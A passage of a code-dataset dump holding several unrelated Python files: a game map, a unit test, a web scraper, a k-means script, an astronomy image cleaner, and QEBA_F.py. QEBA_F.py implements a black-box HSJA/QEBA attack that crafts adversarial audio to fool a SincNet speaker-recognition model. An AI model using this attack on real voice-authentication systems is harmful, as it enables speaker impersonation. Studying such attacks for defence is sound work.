get_our_nodes(self, camp_id):\n return [i for i in self.entire_map if i.ruler == camp_id]\n \n def get_empty_nodes(self):\n return [i for i in self.entire_map if i.ruler == None]\n \n def get_sum_prosperity(self, camp_id):\n return sum([i.prosperity for i in self.get_our_nodes(camp_id)])\n\n def get_neighbor_camps(self, camp_id):\n # 隣接するノードの列挙\n neighbors_id = []\n for m in self.get_our_nodes(camp_id):\n add = [i.node_id for i in m.neighbor_nodes]\n for a in add:\n if a not in neighbors_id:\n neighbors_id.append(a)\n return [self.get_node(i) for i in neighbors_id]\n\n def make_entire_map(self, map_size):\n answer 
= [Map_node(i) for i in range(map_size)]\n # 暫定的に環状のネットワークを作成する\n for i in range(map_size):\n if i < map_size-1:\n answer[i].neighbor_nodes.append(answer[i+1])\n answer[i+1].neighbor_nodes.append(answer[i])\n else:\n answer[i].neighbor_nodes.append(answer[0])\n answer[0].neighbor_nodes.append(answer[i])\n return answer\n\n def isFinished(self):\n return self.turn >= 10\n \n def who_is_strongest(self):\n return max([i.mil_power for i in self.camps])\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"640593872","text":"import unittest\nfrom unittest.mock import MagicMock\n\nimport datetime\nfrom complex_meas_processor.CpxCalculator import CpxCalculator\nfrom complex_meas_processor.MeasurementDef import MeasurementDef\n\n\nclass TestCpxCalculatorTest(unittest.TestCase):\n def test_Calculator(self):\n Y = 2018\n M = 6\n D = 13\n MS = 0\n startMinute = 0\n endMinute = 6\n lastCalcTime = datetime.datetime(Y, M, D, 17, startMinute, 0, MS)\n window = 61 * 2\n interval = 20\n measDef = MeasurementDef(\n \"boring_cabbage\",\n \"myMetricId\",\n \"CPU_USAGE\",\n window,\n interval,\n lastCalcTime,\n \"dummy description\",\n )\n cpxCalculator = CpxCalculator(measDef)\n\n sensorInterval = 30\n numOfMeasures = 10\n simpleMeasurements = [\n [\n i,\n lastCalcTime\n + datetime.timedelta(seconds=i * sensorInterval),\n ]\n for i in range(numOfMeasures)\n ]\n calculationTime = datetime.datetime(Y, M, D, 17, endMinute, 0, MS)\n cpxMeasurements = cpxCalculator.calculate(\n simpleMeasurements, calculationTime\n )\n\n self.assertEqual(\n len(cpxMeasurements),\n ((endMinute - startMinute) * 60 - window) // measDef.interval\n + 1,\n )\n\n self.assertAlmostEqual(cpxMeasurements[0][0], 2.5)\n self.assertAlmostEqual(cpxMeasurements[1][0], 2.5)\n self.assertAlmostEqual(cpxMeasurements[2][0], 3.5)\n self.assertAlmostEqual(cpxMeasurements[3][0], 4.5)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"complex_meas_processor/CpxCalculatorTest.py","file_name":"CpxCalculatorTest.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"530393494","text":"from __future__ import (absolute_import, division,\r\n print_function, unicode_literals)\r\n\r\n\r\nclass TreeNode:\r\n def __init__(self, label, child0=None, child1=None, child2=None, child3=None):\r\n self.label = label\r\n self.tokens = list()\r\n self.children = list()\r\n\r\n\r\ndef print_tree(node, level=0):\r\n if node is not None:\r\n padding = ' ' * level * 4\r\n print('{} {}'.format(padding, node.label))\r\n print('{} {}'.format(padding, '|'.join([str(tk) for tk in node.tokens])))\r\n for child in node.children:\r\n print_tree(child, level + 1)\r\n","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"71030844","text":"\"\"\"\n\n- This script is scraping Worldometer website.\n- This aims ready to use.\n- For step by step and details, Worldometer.ipynb is preferable.\n\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nbase_url = 'https://www.worldometers.info/coronavirus/'\n\ncountry = input('Enter country: ')\nurl = base_url + '/country/' + country\n\n# fetch HTML data\nhtml_text = requests.get(url).text\n\n# parse HTML text using 'lxml'\nsoup = BeautifulSoup(html_text, 
'lxml')\nprint(soup.prettify())\n\ninfo_divs = soup.find('div', class_=\"content-inner\").findAll('div', id='maincounter-wrap')\nprint(info_divs)\n\nfor block in info_divs[:3]:\n title = block.h1.text\n number = block.span.text\n print(title, number)","sub_path":"worldometer.py","file_name":"worldometer.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"473373954","text":"\"\"\"\n This class provide general structure of fitpanel page\n\"\"\"\nimport wx\nfrom sas.sasgui.guiframe.panel_base import PanelBase\n\nclass HintFitPage(wx.ScrolledWindow, PanelBase):\n \"\"\"\n This class provide general structure of fitpanel page\n \"\"\"\n ## Internal name for the AUI manager\n window_name = \"Hint Page\"\n ## Title to appear on top of the window\n window_caption = \"Hint page \"\n\n def __init__(self, parent):\n wx.ScrolledWindow.__init__(self, parent,\n style=wx.FULL_REPAINT_ON_RESIZE)\n PanelBase.__init__(self, parent)\n msg = \"right click on the data when it is highlighted \"\n msg += \"the select option to fit for futher options\"\n self.do_layout()\n\n def do_layout(self):\n \"\"\"\n Draw the page\n \"\"\"\n name = \"Hint\"\n box_description = wx.StaticBox(self, wx.ID_ANY, name)\n boxsizer = wx.StaticBoxSizer(box_description, wx.VERTICAL)\n msg = \" How to link data to the control panel: \\n \\n\"\n msg += \" First load data file from 'File' menu. \\n\"\n msg += \" Then Highlight and right click on the data plot. \\n\"\n msg += \" Finally, select 'Select data for fitting' in the pop-up menu. \\n\"\n self.hint_txt = wx.StaticText(self, wx.ID_ANY, msg, style=wx.ALIGN_LEFT)\n boxsizer.Add(self.hint_txt, wx.ALL | wx.EXPAND, 20)\n self.vbox = wx.BoxSizer(wx.VERTICAL)\n self.vbox.Add(boxsizer)\n self.vbox.Layout()\n self.vbox.Fit(self)\n self.SetSizer(self.vbox)\n self.SetScrollbars(20, 20, 25, 65)\n self.Layout()\n\n def createMemento(self):\n return\n\n\nclass HelpWindow(wx.Frame):\n def __init__(self, parent, id, title):\n wx.Frame.__init__(self, parent, id, title, size=(570, 400))\n\n self.page = HintFitPage(self)\n self.Centre()\n self.Show(True)\n","sub_path":"src/sas/sasgui/perspectives/fitting/hint_fitpage.py","file_name":"hint_fitpage.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"415472926","text":"import numpy as np\nimport pandas as pd\n\nimport pickle\n\ndef document_vector_matrix(df):\n\n\t#\n\t#\tRead Document IDs and Create DocId to Row Map\n\t#\n\n\t# docIDs\n\tdocIDs = []\n\tfor did in df[['docID']].values.tolist():\n\t\tdocIDs.append(did[0])\n\n\t# num rows in matrix \n\tnrows = len(docIDs)\n\n\t# doc2row map\n\trows = range(0, nrows)\n\tdoc2row = dict(zip(docIDs, rows))\n\n\t#\n\t#\tRead Document Texts and Create Unique Word to Column Map\n\t#\n\n\t# unique words\n\tcorpus = ''\n\tdocument_texts = []\n\tfor sentence in df[['document text']].values.tolist():\n\t\tcorpus += sentence[0] + ' '\n\t\tdocument_texts.append(sentence[0].split(' '))\n\tunique_words = list(set(corpus.split(' ')))\n\n\t# filter lengths < 1 (TMP MESS)\n\tunique_words = [w for w in unique_words if len(w) > 0]\n\tfor sentence in document_texts:\n\t\tsentence = [w for w in sentence if len(w) > 0]\n\n\t# num columns in matrix\n\tncols = len(unique_words)\n\n\t# word2column map\n\tcolumns = range(0, ncols)\n\tword2column = dict(zip(unique_words, columns))\n\n\t#\n\t#\tCreate Document Vector Matrix\n\t#\n\n\t# 
create empty matrix\n\tM = np.zeros((nrows, ncols), dtype=np.int64)\n\n\t# fill matrix\n\tfor row in range(0, nrows):\n\t\tfor word in document_texts[row]:\n\t\t\tcol = word2column[word]\n\t\t\tM[row,col] += 1\n\n\n\t# return M (matrix), doc2row (map), word2column (map)\n\treturn M, doc2row, word2column\n\ndef nearest_centroid(vector, matrix_centroid_vectors):\n\n\t# specs\n\tk = matrix_centroid_vectors.shape[0]\n\tdim = vector.shape[0]\n\n\t# find smallest Frobenius norm of row vectors in matrix_distance_vectors\n\tdistance_vector_template = np.zeros(dim)\n\tmatrix_distance_vectors = np.zeros(matrix_centroid_vectors.shape)\n\n\t# find distance between given vector and each centroid vector\n\tfor centroid_vector_index in range(0,k):\n\t\tdiff = np.subtract(vector, matrix_centroid_vectors[centroid_vector_index])\n\t\tmatrix_distance_vectors[centroid_vector_index,:] = diff\n\n\t# find the index of the nearest centroid in matrix_centroid_vectors and return\n\tcentroid_distances = np.linalg.norm(matrix_distance_vectors, axis=1)\n\tindex_nearest_centroid = centroid_distances.argmin()\n\treturn index_nearest_centroid\n\n# returns vector with indices of closest centroid for each row vector in vector matrix\ndef nearest_centroid_vector(vector_matrix, matrix_centroid_vectors):\n\n\tnum_vectors = vector_matrix.shape[0] # num rows (row vectors)\n\tnc_vector = np.zeros(num_vectors)\t # nearest centroid vector\n\n\tfor vector_index in range(0, num_vectors):\n\t\tvector = vector_matrix[vector_index]\n\t\tnc_vector[vector_index] = nearest_centroid(vector, matrix_centroid_vectors)\n\n\treturn nc_vector\n\ndef update_centroids(vector_matrix, matrix_centroid_vectors): \n\n\tk = matrix_centroid_vectors.shape[0]\n\tnum_vectors = vector_matrix.shape[0] # num rows (row vectors)\n\tnc_vector = nearest_centroid_vector(vector_matrix, matrix_centroid_vectors) # nearest centroid vector\n\n\t# find new centroid centers\n\tfor centroid_index in range(0, k):\n\n\t\t# find vectors with the current centroid as their closest centroid\n\t\tmember_vector_indices = np.where(nc_vector == centroid_index)[0]\n\t\tmember_vectors = vector_matrix[member_vector_indices]\n\n\t\t# find vector group's center\n\t\tupdated_centroid_vector = np.mean(member_vectors,axis=0)\n\n\t\t# update matrix of centroid vectors\n\t\tmatrix_centroid_vectors[centroid_index,:] = updated_centroid_vector\n\n\n\t# return updated centroids\n\treturn matrix_centroid_vectors\n\n\ndef kmeans(vector_matrix, k, max_iters):\n\n\tdim = vector_matrix.shape[1]\n\tmaximum = np.max(vector_matrix)\n\tminimum = np.min(vector_matrix)\n\n\t# initialize centroids randomly\n\tmatrix_centroid_vectors = np.random.uniform(low=minimum, high=maximum, size=(k,dim))\n\t# keep a copy: update_centroids modifies matrix_centroid_vectors in place,\n\t# so comparing against the same object would always report convergence\n\tprevious_centroids = matrix_centroid_vectors.copy()\n\n\t# initialize iteration count\n\tcount = 1\n\n\t# run algorithm\n\twhile (count <= max_iters):\n\t\tmatrix_centroid_vectors = update_centroids(vector_matrix, matrix_centroid_vectors)\n\n\t\t# break if centroid vectors are the same\n\t\tif np.array_equal(matrix_centroid_vectors, previous_centroids):\n\t\t\treturn matrix_centroid_vectors, count\n\n\t\tprevious_centroids = matrix_centroid_vectors.copy()\n\n\t\tcount += 1\n\n\treturn matrix_centroid_vectors, count\n\n#\n# Start\n#\n\n# read question 4 csv\ndoc = \"Question_4.csv\"\ndf = pd.read_csv(doc, header=0, dtype={'docID' : np.int64, 'document text':str}) \n\n# create document vector matrix\nM, doc2row, word2column = document_vector_matrix(df)\n\n\n# testing save and load M for consistent results\n\n\n# 
save\n\npd.DataFrame(data=M).to_csv(\"M.csv\", index=False)\n\noutput = open('doc2row.pkl', 'wb')\npickle.dump(doc2row, output)\noutput.close()\n\noutput = open('word2column.pkl', 'wb')\npickle.dump(word2column, output)\noutput.close()\n\n\n# load\n\nM = pd.read_csv(\"M.csv\").values\n\npkl_file = open('doc2row.pkl', 'rb')\ndoc2row = pickle.load(pkl_file)\npkl_file.close()\n\npkl_file = open('word2column.pkl', 'rb')\nword2column = pickle.load(pkl_file)\npkl_file.close()\n\nprint(M)\nprint(word2column)\n\n\n#\n# Kmeans\n#\n\n\n# note uses row vector matrices\n# testing \nnum_trials = 10\nfor i in range(0,num_trials):\n\tprint(kmeans(M, 2, 100))\n\n\n","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":4963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"641800052","text":"# -*- coding: UTF-8 -*-\nimport utils.Sincnet as Sincnet\nimport torch\nimport numpy as np\nimport scipy.fftpack as ffp\nimport soundfile as sf\nclass HSJA(object):\n def __init__(self,MODE,SAVE_DIR_PATH,query_num,interval, num_iterations=2000, gamma=1.0,\n stepsize_search='geometric_progression',\n max_num_evals=1e4, init_num_evals=100,query_limit=25000, verbose=True):\n self.model = Sincnet.get_speaker_model(MODE)\n self.num_iterations = num_iterations\n self.gamma = gamma\n self.stepsize_search = stepsize_search\n self.max_num_evals = max_num_evals\n self.init_num_evals = init_num_evals\n self.verbose = verbose\n self.SAVE_DIR_PATH=SAVE_DIR_PATH\n self.query_num=query_num\n self.query_limit=query_limit\n self.interval=interval\n self.dct = lambda x: ffp.dct(x, norm='ortho')\n self.idct = lambda ix: ffp.idct(ix, norm='ortho')\n\n def hsja(self, input_xi, label_or_target, initial_xi):\n # Set parameters\n # original_label = np.argmax(self.model.predict_label(input_xi))\n d = int((self.interval[1]-self.interval[0])*self.dct_field)\n # Set binary search threshold.\n theta = self.gamma / (np.sqrt(d) * d)\n\n # Initialize.\n perturbed = initial_xi\n\n # Project the initialization to the boundary.\n perturbed, dist_post_update = self.binary_search_batch(input_xi, perturbed, label_or_target, theta)\n dist = self.compute_distance(perturbed, input_xi)\n\n for j in np.arange(self.num_iterations):\n # params['cur_iter'] = j + 1\n\n # Choose delta.\n if j == 1:\n delta = 0.2\n else:\n delta = np.sqrt(d) * theta * dist_post_update\n num_evals = int(self.init_num_evals * np.sqrt(j + 1))\n num_evals = int(min([num_evals, self.max_num_evals]))\n\n # approximate gradient.\n gradf = self.approximate_gradient(perturbed, label_or_target, num_evals,\n delta)\n update = gradf\n\n # search step size.\n if self.stepsize_search == 'geometric_progression':\n # find step size.\n epsilon = self.geometric_progression_for_stepsize(perturbed, label_or_target,\n update, dist, j + 1)\n\n # Update the sample.\n perturbed = self.clip_image(perturbed + epsilon * update)\n\n # Binary search to return to the boundary.\n perturbed, dist_post_update = self.binary_search_batch(input_xi,\n perturbed[None], label_or_target, theta)\n\n elif self.stepsize_search == 'grid_search':\n # Grid search for stepsize.\n epsilons = np.logspace(-4, 0, num=20, endpoint=True) * dist\n epsilons_shape = [20] + len(input_xi.shape) * [1]\n perturbeds = perturbed + epsilons.reshape(epsilons_shape) * update\n perturbeds = self.clip_image(perturbeds)\n idx_perturbed = self.decision_function(perturbeds, label_or_target)\n\n if np.sum(idx_perturbed) > 0:\n # Select the perturbation that yields the 
minimum distance after binary search.\n                perturbed, dist_post_update = self.binary_search_batch(input_xi,\n                                                                        perturbeds[idx_perturbed], label_or_target,\n                                                                        theta)\n\n            # compute new distance.\n            dist = self.compute_distance(perturbed, input_xi)\n            if self.verbose:\n                with open(self.SAVE_DIR_PATH, 'a+', encoding='utf-8') as f:\n                    f.write(\"{}\\t{}\\n\".format(self.query_num,dist ))\n                print('iteration: {:d}, distance {:.4E}'.format(j + 1, dist))\n            if self.query_num>self.query_limit:\n                break\n            sf.write(r\"F:\SR-ATK\show\expQEBA\fake_{}_{}.wav\".format(self.query_num, np.linalg.norm(perturbed - input_xi)),perturbed.squeeze(),16000)\n\n        return perturbed\n\n    def predict_one_label(self,data):\n        self.query_num+=1\n        data=data.squeeze()\n        pred_real, pred_pro = Sincnet.sentence_test(self.model,\n                                                    torch.from_numpy(data).float().cuda())\n        return pred_real\n    def predict_more_label(self,datas):\n        preds=[]\n        for item in datas:\n            preds.append(self.predict_one_label(item))\n        return np.array(preds)\n    def decision_function(self, images, label):\n        \"\"\"\n        Decision function output 1 on the desired side of the boundary,\n        0 otherwise.\n        \"\"\"\n        la=self.predict_more_label(images)\n        la=np.array(la)\n        return (la == label)\n\n\n    def clip_image(self, image, clip_min=-1, clip_max=1):\n        # Clip an image, or an image batch, with upper and lower threshold.\n        return np.minimum(np.maximum(clip_min, image), clip_max)\n\n    def compute_distance(self, x_ori, x_pert):\n        # Compute the distance between two images.\n        return np.linalg.norm(x_ori - x_pert)\n\n    def dct_p_to_all(self,dct_p):\n        \"\"\"\n        :param dct_p:(n,1,dl)\n        :return: (n,1,16000)\n        \"\"\"\n        length=len(dct_p.shape)\n        shp=list(dct_p.shape)\n        shp[-1]=16000\n        res=np.zeros(shp)\n        lr=int(self.dct_field*(self.interval[1]-self.interval[0]))\n        if length == 3:\n            res[:,:,:lr]=dct_p[:,:,:]\n        else:\n            res[:, :lr] =dct_p[:, :]\n        return self.idct(res)\n\n    def approximate_gradient(self, sample, label_or_target, num_evals, delta):\n\n        # Generate random vectors.\n        noise_shape = [num_evals,1,int(self.dct_field*(self.interval[1]-self.interval[0]))]\n        rv = np.random.randn(*noise_shape)\n        rv=self.dct_p_to_all(rv)\n        rv[:,:,:self.interval[0]]=0\n        rv[:, :, self.interval[1]:] = 0\n\n        rv = rv / np.sqrt(np.sum(rv ** 2, axis=(1, 2), keepdims=True))\n        perturbed = sample + delta * rv\n        perturbed = self.clip_image(perturbed)\n        rv = (perturbed - sample) / delta\n\n        # query the model.\n        decisions = self.decision_function(perturbed, label_or_target)\n        decision_shape = [len(decisions)] + [1] * len(sample.shape)\n        fval = 2 * decisions.astype(float).reshape(decision_shape) - 1.0\n\n        # Baseline subtraction (when fval differs)\n        if np.mean(fval) == 1.0: # label changes.\n            gradf = np.mean(rv, axis=0)\n        elif np.mean(fval) == -1.0: # label not change.\n            gradf = - np.mean(rv, axis=0)\n        else:\n            fval -= np.mean(fval)\n            gradf = np.mean(fval * rv, axis=0)\n\n        # Get the gradient direction.\n        gradf = gradf / np.linalg.norm(gradf)\n\n        return gradf\n\n    def project(self, original_image, perturbed_images, alphas):\n        alphas_shape = [1] * len(original_image.shape)\n        alphas = alphas.reshape(alphas_shape)\n        return (1 - alphas) * original_image + alphas * perturbed_images\n\n\n    def binary_search_batch(self, original_image, perturbed_images, label_or_target, theta):\n        \"\"\" Binary search to approach the boundary. 
\"\"\"\n\n # Compute distance between each of perturbed image and original image.\n dists_post_update = np.array([\n self.compute_distance(\n original_image,\n perturbed_image\n )\n for perturbed_image in perturbed_images])\n # print(dists_post_update)\n # Choose upper thresholds in binary searchs based on constraint.\n highs = np.ones(len(perturbed_images))\n thresholds = theta\n\n lows = np.zeros(len(perturbed_images))\n\n # Call recursive function.\n while np.max((highs - lows) / thresholds) > 1:\n # projection to mids.\n mids = (highs + lows) / 2.0\n mid_images = self.project(original_image, perturbed_images, mids)\n # print(mid_images.shape)\n # Update highs and lows based on model decisions.\n decisions = self.decision_function(mid_images, label_or_target)\n lows = np.where(decisions == 0, mids, lows)\n highs = np.where(decisions == 1, mids, highs)\n\n out_images = self.project(original_image, perturbed_images, highs)\n\n # Compute distance of the output image to select the best choice.\n # (only used when stepsize_search is grid_search.)\n dists = np.array([\n self.compute_distance(\n original_image,\n out_image\n )\n for out_image in out_images])\n idx = np.argmin(dists)\n\n dist = dists_post_update[idx]\n out_image = out_images[idx]\n return out_image, dist\n\n\n def geometric_progression_for_stepsize(self, x, label_or_target, update, dist, j):\n \"\"\"\n Geometric progression to search for stepsize.\n Keep decreasing stepsize by half until reaching\n the desired side of the boundary,\n \"\"\"\n epsilon = dist / np.sqrt(j)\n\n def phi(epsilon):\n new = x + epsilon * update\n success = self.decision_function(new, label_or_target)\n return success\n\n while not phi(epsilon):\n epsilon /= 2.0\n\n return epsilon\n\n def __call__(self, input_xi, label_or_target, initial_xi,dct_field):\n self.dct_field=dct_field\n label_or_target = np.array([label_or_target])\n adv = self.hsja(input_xi, label_or_target, initial_xi)\n return adv.squeeze()\n\n\n\n\n","sub_path":"QEBA_F.py","file_name":"QEBA_F.py","file_ext":"py","file_size_in_byte":9800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"509858869","text":"# desc: facebook telephone interview task, 7/4/2014\n#\n# Goat Latin is a made-up language based off of English, sort of like Pig Latin. The rules of Goat Latin are as follows:\n# 1. If a word begins with a consonant (i.e. not a vowel), remove the first letter and append it to the end, then add 'ma'.\n# For example, the word 'goat' becomes 'oatgma'.\n# 2. If a word begins with a vowel, append 'ma' to the end of the word.\n# For example, the word 'I' becomes 'Ima'.\n# 3. Add one letter \"a\" to the end of each word per its word index in\n# the sentence, starting with 1. That is, the first word gets \"a\" added\n# to the end, the second word gets \"aa\" added to the end, the third word\n# in the sentence gets \"aaa\" added to the end, and so on.\n\n\n\nprint(\"Please enter a sentence: \", end=\"\")\nsentence = input()\nwords = sentence.split(\" \")\ntrailing = \"a\"\n\nfor word in words:\n if(word[0] in [\"a\",\"e\",\"i\",\"o\",\"u\"]):\n word = word + \"ma\"\n else:\n first_cha = word[0]\n word = word[1:]\n word = word + first_cha + \"ma\"\n\n word = word + trailing\n print(word)\n trailing = trailing + \"a\"\n\n# Note that the original words list is not modified. 
If the intent is to have the goat latin accessible outside the\n# for loop, then use an enumeration to loop through the list and modify 'words' list in place","sub_path":"goat_latin.py","file_name":"goat_latin.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"521435019","text":"from django import forms\nfrom django.views.generic import ListView\nfrom django.utils.translation import gettext as _\nfrom django.shortcuts import render\n\nfrom selia.views.utils.search_filter import SearchFilter\n\n\nclass SearchForm(forms.Form):\n    search = forms.CharField(\n        label=_('search'),\n        max_length=100,\n        required=False)\n\n\nclass SeliaListView(ListView):\n    paginate_by = 10\n    empty_message = _('Empty list')\n    no_permission_template = 'selia_templates/generic/no_permission.html'\n\n    def has_view_permission(self):\n        return self.request.user.is_authenticated\n\n    def has_create_permission(self):\n        return True\n\n    def no_permission_redirect(self):\n        return render(self.request, self.no_permission_template)\n\n    def clean_chain(self):\n        self.request.session['chain'] = ''\n\n    def get(self, *args, **kwargs):\n        self.clean_chain()\n\n        if not self.has_view_permission():\n            return self.no_permission_redirect()\n\n        return super().get(*args, **kwargs)\n\n    def get_list_item_template(self):\n        if hasattr(self, 'list_item_template'):\n            return self.list_item_template\n\n        raise NotImplementedError('No template for list item was given')\n\n    def get_filter_form_template(self):\n        if hasattr(self, 'filter_form_template'):\n            return self.filter_form_template\n\n        raise NotImplementedError('No template for filter form was given')\n\n    def get_help_template(self):\n        if hasattr(self, 'help_template'):\n            return self.help_template\n\n        raise NotImplementedError('No template for help was given')\n\n    def get_search_form(self):\n        return SearchForm(self.request.GET)\n\n    def get_ordering_choices(self):\n        orderings = []\n        for field, label in self.ordering_fields:\n            orderings.append(\n                (\n                    '-{field}'.format(field=field),\n                    '{order} {label}'.format(\n                        label=label, order=_('↓'))\n                )\n            )\n\n            orderings.append(\n                (\n                    field,\n                    '{order} {label}'.format(\n                        label=label, order=_('↑'))\n                )\n            )\n        return orderings\n\n    def get_ordering_form(self):\n        ordering_choices = self.get_ordering_choices()\n\n        class OrderingForm(forms.Form):\n            order = forms.ChoiceField(\n                label=_('ordering'),\n                choices=ordering_choices)\n\n        ordering_form = OrderingForm(self.request.GET)\n        return ordering_form\n\n    def get_filter_class(self):\n        if hasattr(self, 'filter_class'):\n            return self.filter_class\n\n        raise NotImplementedError('No filter class was provided')\n\n    def get_initial_queryset(self):\n        if hasattr(self, 'queryset'):\n            return self.queryset\n\n        raise NotImplementedError('No initial queryset was provided')\n\n    def get_queryset(self):\n        queryset = self.get_initial_queryset()\n        return self.filter_queryset(queryset)\n\n    def filter_queryset_with_query(self, queryset):\n        try:\n            filter_class = self.get_filter_class()\n            self.filter = filter_class(\n                self.request.GET,\n                queryset=queryset,\n                request=self.request)\n            queryset = self.filter.qs\n        except NotImplementedError:\n            pass\n\n        return queryset\n\n    def filter_queryset_with_search(self, queryset):\n        if hasattr(self, 'search_fields'):\n            self.search_form = self.get_search_form()\n\n            if self.search_form.is_valid():\n                queryset = SearchFilter().filter_queryset(self.request, queryset, self)\n\n        return queryset\n\n    def order_queryset(self, 
queryset):\n if hasattr(self, 'ordering_fields'):\n self.order_form = self.get_ordering_form()\n\n if self.order_form.is_valid():\n ordering = self.order_form.data['order']\n queryset = queryset.order_by(ordering)\n\n return queryset\n\n def filter_queryset(self, queryset):\n queryset = self.filter_queryset_with_query(queryset)\n queryset = self.filter_queryset_with_search(queryset)\n return self.order_queryset(queryset)\n\n def get_permissions(self):\n return {\n 'create': self.has_create_permission()\n }\n\n def get_templates(self):\n return {\n 'help': self.get_help_template(),\n 'list_item': self.get_list_item_template(),\n 'filter_form': self.get_filter_form_template(),\n }\n\n def get_forms(self):\n forms = {}\n if hasattr(self, 'filter'):\n forms['filter'] = self.filter\n\n if hasattr(self, 'search_form'):\n forms['search'] = self.search_form\n\n if hasattr(self, 'order_form'):\n forms['order'] = self.order_form\n\n return forms\n\n def get_context_data(self, **kwargs):\n context = {'object_list': super().get_context_data(**kwargs)}\n context['forms'] = self.get_forms()\n context['templates'] = self.get_templates()\n context['permissions'] = self.get_permissions()\n return context\n","sub_path":"selia/views/list_views/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"442530441","text":"from __future__ import print_function, division\nimport astropy.io.fits as pyfits\nimport numpy as np\nimport sys\nimport subprocess\nfrom scipy import signal\nimport weightedstats as ws\nfrom skimage.filters.rank import median as skmed\n\n\"\"\"\n__author__ = 'Will Hartley'\n\nCode to clean up the VISTA VIDEO single-chip coadds' backgrounds.\n\nSteps:\n- run sextractor, with some default set of params\n- expand segmentation map by 4 px (choice of 6px for 0.1342\" / px is optimal for UDS, VISTA pixels are 0.2636\"). Actually using a convolution with a square array\n- use expanded segmap as mask in a median filtering of the background\n- Filter is a simple square (129x129 px, i.e., 34x34 arcsec) \n- to make the algorithm run easier, we should embed the image in a larger array.\n\"\"\"\n\n# Image Object\n# properties: file_name, weightmap, size, weight_name, mask, cleaned_im, cleaned_name, conf (configuration constants - see __main__)\n# methods: run sextractor, embed image, make mask (inc. read segmap, expand segmap), clean image, save cleaned\n\nclass video_image:\n\n def __init__(self, fname, conf):\n\n self.fname = fname\n self.conf = conf\n\n # read the image, set-up weightmap filename\n self.read_image()\n\n\n def pad_array(self, im_array):\n # pad the array on all sides with the number of px in conf\n # and return the padded array\n pad_array = np.zeros((im_array.shape[0]+self.conf.pad_px*2,im_array.shape[1]+self.conf.pad_px*2))\n pad_array[self.conf.pad_px-1:pad_array.shape[0]-self.conf.pad_px-1, self.conf.pad_px-1:pad_array.shape[1]-self.conf.pad_px-1] = im_array\n return pad_array\n \n \n def read_image(self):\n # read header keywords and image data, pad image data, construct weightmap filename \n with pyfits.open(self.fname) as f:\n self.im_size = f[0].header['NAXIS2'], f[0].header['NAXIS1'] # axes switched in python w.r.t. 
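# --- Design note: the manual embedding in pad_array() above can be expressed
# with numpy's built-in padding, which also sidesteps the slightly lopsided
# `pad_px-1` slice offsets. A sketch of the equivalent call:
import numpy as np

def pad_array_np(im, pad_px=65):
    # zero-pad pad_px pixels on every side of the image
    return np.pad(im, pad_px, mode="constant", constant_values=0)

assert pad_array_np(np.ones((4, 4)), 2).shape == (8, 8)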
fits expectation.\n self.im_data = self.pad_array(f[0].data)\n self.im_head = f[0].header\n self.weight_name = '.'.join(fname.split('.')[:-1])+'.weight.fits' # assumes weight extension, could allow this to change via conf.\n self.clean_name = '.'.join(fname.split('.')[:-1])+'.cleaned.fits'\n \n \n def run_sex(self):\n # run sextractor\n subprocess.call('sex -c VIDEO.sex {0} -WEIGHT_IMAGE {1}'.format(self.fname, self.weight_name), shell=True)\n\n\n def expand_seg(self, seg):\n seg = signal.convolve2d(seg, np.ones((self.conf.exp_seg,self.conf.exp_seg)), mode='same')\n seg = np.floor(seg/self.conf.exp_seg**2)\n return seg\n\n \n def save_mask(self):\n # save the mask\n hdu = pyfits.PrimaryHDU(self.mask)\n hdu.writeto('mask.fits', clobber=True)\n \n\n def read_mask(self):\n # read in segmap\n segmap = pyfits.open('seg.fits')[0].data\n \n # change values such that source pixels are 0 and background are 1\n segmap[segmap==1] = 2\n segmap[segmap==0] = 1\n segmap[segmap>1] = 0\n\n # expand sources in segmap by pre-defined amount\n segmap = self.expand_seg(segmap)\n\n # embed in larger array\n self.mask = self.pad_array(segmap)\n\n # mask border region\n self.mask[0:self.conf.pad_px+self.conf.border,:] = 0\n self.mask[self.mask.shape[0]-(1+self.conf.pad_px+self.conf.border):,:] = 0\n self.mask[:, 0:self.conf.pad_px+self.conf.border] = 0\n self.mask[:, self.mask.shape[1]-(1+self.conf.pad_px+self.conf.border):] = 0\n\n # For testing purposes, we might want to save the mask\n if self.conf.bug_check == True:\n self.save_mask()\n\n\n def save_bugcheck_im(self, im, name):\n # save the bugcheck image\n hdu = pyfits.PrimaryHDU(im)\n hdu.writeto(name, clobber=True)\n \n\n def clean_im_BAD(self):\n # THIS DOESN'T WORK AT ALL - BIT DEPTH IS INSUFFICIENT\n \n # using masked median filter from scikit\n # filter the image, rejecting source pixels and masked regions\n tmp_im = self.im_data\n tmp_im[self.mask==0] = 0.\n tmp_im[tmp_im > self.conf.clip] = self.conf.clip\n tmp_im[tmp_im < -1.* self.conf.clip] = -1. * self.conf.clip\n\n # if testing, save the temporary image\n if self.conf.bug_check == True:\n self.save_bugcheck_im(tmp_im, 'tmp.fits')\n\n # invert mask for use with the scikit function - don't need\n #self.mask = -1 * self.mask + 1 \n \n # scale to range (-1, 1)\n im_max = np.max(np.abs(tmp_im))\n tmp_im /= im_max\n self.cleaned_im = skmed(tmp_im, selem=np.ones((self.conf.exp_seg*2+1,self.conf.exp_seg*2+1)), mask=self.mask)\n 